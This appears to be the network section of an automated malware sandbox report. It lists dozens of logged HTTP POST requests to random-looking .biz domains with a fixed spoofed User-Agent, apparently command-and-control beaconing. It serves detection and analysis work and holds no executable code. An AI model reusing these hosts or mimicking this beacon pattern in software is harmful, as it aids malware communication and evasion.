                      Source: global trafficHTTP traffic detected: POST /rneunjrpeefdom HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                      Source: global trafficHTTP traffic detected: POST /jnek HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /ogua HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                      Source: global trafficHTTP traffic detected: POST /yypcywwrp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /mekek HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                      Source: global trafficHTTP traffic detected: POST /qfuwtgjk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                      Source: global trafficHTTP traffic detected: POST /mdv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /tcewuceccwlpap HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                      Source: global trafficHTTP traffic detected: POST /kiuupxbhsmi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /llpilismcsqqsd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /aldxsqumvddjjq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                      Source: global trafficHTTP traffic detected: POST /qwmkydqbbfrm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /ebrtsarfcsylm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /fymfqakvq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /dauxqowjtksae HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /codtypdrb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /xurkvjsynkj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /mjdirtnxyxmmbdd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /qd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /lqbpdlmeudihjsyy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /qaejwi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /xsynoi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /kxeknkvhxjifd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /jrbjefwrwpdia HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /odbjxuabwhunfmmt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /slpstmitttatqv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /kwwcclrc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /mndfsbyfnglsm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /ynekytqvwifwsqd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /xkorvlthchk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /eaufcaidikag HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /xev HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /bhaolncilxcwwbrc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /xgntpyqjfcaulras HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /phrsxg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /ywvbvutri HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /uahjpn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /ylgyimlxuhkehpvh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /tipadjqthieq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /cxebwuvsfeq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /wheatfeoc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /ac HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /ltpabackndy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /ohnuij HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /srxp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /cwpmdhyer HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /txxefbew HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /vwka HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /awclfrtxgvu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /hppmgsitpcfjw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /ggbuhmxfarcrplg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /cl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /vommasbpmwjrwo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /joygyaofiuw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /jvdwdelnnjmgtxf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /mhdtcntnalxh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /kgdhcykbe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /efnfkaqjisfwrsut HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /xr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /dqqtqvvcpfgtdct HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /wpbyxw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /axu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /dlnxocdhcatvbeh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                      Source: global trafficHTTP traffic detected: POST /ynbq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /qcmhkl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
